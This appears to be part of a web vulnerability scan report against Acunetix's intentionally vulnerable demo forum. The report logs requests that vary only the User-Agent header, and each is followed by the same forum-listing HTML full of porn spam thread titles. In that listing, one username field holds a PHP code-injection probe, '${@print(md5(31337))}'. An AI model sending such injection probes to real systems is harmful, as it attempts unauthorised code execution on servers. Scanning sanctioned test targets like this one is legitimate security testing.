class='threadtitle'><a href='showthread.asp?id=7'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=8'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=9'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=10'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=11'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=12'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=13'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=14'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:30 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=15'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:30 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=16'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:30 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=17'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:30 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=18'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:31 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=19'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:31 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=20'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:31 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=21'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:31 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=22'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:31 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=23'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:32 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=24'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:32 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=25'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:32 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=26'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:32 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=27'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:33 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=28'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:33 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=29'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:33 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=30'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:13:43 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=31'>Hot galleries, daily updated collections</a></div></td><td>1</td><td>victoriadi1</td><td>3/13/2022 10:23:53 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=32'>Big Ass Photos - Free Huge Butt Porn, Big Booty Pics</a></div></td><td>1</td><td>susanac1</td><td>3/13/2022 12:03:13 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=33'>Best Nude Playmates & Centerfolds, Beautiful galleries daily updates</a></div></td><td>1</td><td>kristiela3</td><td>3/13/2022 3:28:51 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=34'>New hot project galleries, daily updates</a></div></td><td>1</td><td>friedajd1</td><td>3/13/2022 9:02:56 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=35'>Free Porn Pictures and Best HD Sex Photos</a></div></td><td>1</td><td>dianezg60</td><td>3/13/2022 11:25:30 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=36'>test</a></div></td><td>1</td><td>hanxuan</td><td>3/14/2022 1:14:17 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=37'>Hot photo galleries blogs and pictures</a></div></td><td>1</td><td>sethpq11</td><td>3/14/2022 2:11:33 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=38'>Mr.</a></div></td><td>1</td><td>${@print(md5(31337))}\</td><td>3/14/2022 4:18:48 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=39'>Shemale Sexy Galleries</a></div></td><td>1</td><td>ineshy11</td><td>3/14/2022 6:42:20 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=40'>Nude Sex Pics, Sexy Naked Women, Hot Girls Porn</a></div></td><td>12</td><td>myrnaou3</td><td>3/14/2022 8:17:05 AM</td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;left:10%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 |
| Method | GET |
| Parameter | Header User-Agent |
| Attack | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) |
| Evidence | |
| Request Header - size: 379 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 178 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:19:10 GMT Content-Length: 10038 |
| Response Body - size: 10,038 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Acunetix Web Vulnerability Scanner</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> Acunetix Web Vulnerability Scanner </div> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Thread</td> <td class="tableheader">Posts</td> <td class="tableheader">Posted by</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=0'>42</a></div></td><td>36</td><td>Pedro Miguel</td><td>3/13/2022 2:43:15 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=1'>42</a></div></td><td>7</td><td>Pedro Miguel</td><td>3/13/2022 3:13:51 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=2'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=3'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=4'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=5'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=6'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=7'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=8'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=9'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=10'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=11'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=12'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=13'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=14'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:30 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=15'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:30 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=16'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:30 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=17'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:30 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=18'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:31 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=19'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:31 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=20'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:31 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=21'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:31 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=22'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:31 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=23'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:32 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=24'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:32 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=25'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:32 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=26'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:32 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=27'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:33 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=28'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:33 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=29'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:33 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=30'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:13:43 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=31'>Hot galleries, daily updated collections</a></div></td><td>1</td><td>victoriadi1</td><td>3/13/2022 10:23:53 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=32'>Big Ass Photos - Free Huge Butt Porn, Big Booty Pics</a></div></td><td>1</td><td>susanac1</td><td>3/13/2022 12:03:13 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=33'>Best Nude Playmates & Centerfolds, Beautiful galleries daily updates</a></div></td><td>1</td><td>kristiela3</td><td>3/13/2022 3:28:51 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=34'>New hot project galleries, daily updates</a></div></td><td>1</td><td>friedajd1</td><td>3/13/2022 9:02:56 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=35'>Free Porn Pictures and Best HD Sex Photos</a></div></td><td>1</td><td>dianezg60</td><td>3/13/2022 11:25:30 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=36'>test</a></div></td><td>1</td><td>hanxuan</td><td>3/14/2022 1:14:17 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=37'>Hot photo galleries blogs and pictures</a></div></td><td>1</td><td>sethpq11</td><td>3/14/2022 2:11:33 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=38'>Mr.</a></div></td><td>1</td><td>${@print(md5(31337))}\</td><td>3/14/2022 4:18:48 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=39'>Shemale Sexy Galleries</a></div></td><td>1</td><td>ineshy11</td><td>3/14/2022 6:42:20 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=40'>Nude Sex Pics, Sexy Naked Women, Hot Girls Porn</a></div></td><td>12</td><td>myrnaou3</td><td>3/14/2022 8:17:05 AM</td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;left:10%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 |
| Method | GET |
| Parameter | Header User-Agent |
| Attack | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) |
| Evidence | |
| Request Header - size: 379 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 178 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:19:09 GMT Content-Length: 10038 |
| Response Body - size: 10,038 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Acunetix Web Vulnerability Scanner</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> Acunetix Web Vulnerability Scanner </div> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Thread</td> <td class="tableheader">Posts</td> <td class="tableheader">Posted by</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=0'>42</a></div></td><td>36</td><td>Pedro Miguel</td><td>3/13/2022 2:43:15 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=1'>42</a></div></td><td>7</td><td>Pedro Miguel</td><td>3/13/2022 3:13:51 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=2'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=3'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=4'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=5'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=6'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=7'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=8'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=9'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=10'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=11'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=12'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=13'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=14'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:30 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=15'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:30 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=16'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:30 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=17'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:30 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=18'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:31 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=19'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:31 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=20'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:31 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=21'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:31 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=22'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:31 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=23'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:32 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=24'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:32 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=25'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:32 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=26'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:32 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=27'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:33 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=28'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:33 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=29'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:33 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=30'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:13:43 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=31'>Hot galleries, daily updated collections</a></div></td><td>1</td><td>victoriadi1</td><td>3/13/2022 10:23:53 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=32'>Big Ass Photos - Free Huge Butt Porn, Big Booty Pics</a></div></td><td>1</td><td>susanac1</td><td>3/13/2022 12:03:13 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=33'>Best Nude Playmates & Centerfolds, Beautiful galleries daily updates</a></div></td><td>1</td><td>kristiela3</td><td>3/13/2022 3:28:51 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=34'>New hot project galleries, daily updates</a></div></td><td>1</td><td>friedajd1</td><td>3/13/2022 9:02:56 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=35'>Free Porn Pictures and Best HD Sex Photos</a></div></td><td>1</td><td>dianezg60</td><td>3/13/2022 11:25:30 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=36'>test</a></div></td><td>1</td><td>hanxuan</td><td>3/14/2022 1:14:17 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=37'>Hot photo galleries blogs and pictures</a></div></td><td>1</td><td>sethpq11</td><td>3/14/2022 2:11:33 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=38'>Mr.</a></div></td><td>1</td><td>${@print(md5(31337))}\</td><td>3/14/2022 4:18:48 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=39'>Shemale Sexy Galleries</a></div></td><td>1</td><td>ineshy11</td><td>3/14/2022 6:42:20 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=40'>Nude Sex Pics, Sexy Naked Women, Hot Girls Porn</a></div></td><td>12</td><td>myrnaou3</td><td>3/14/2022 8:17:05 AM</td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div 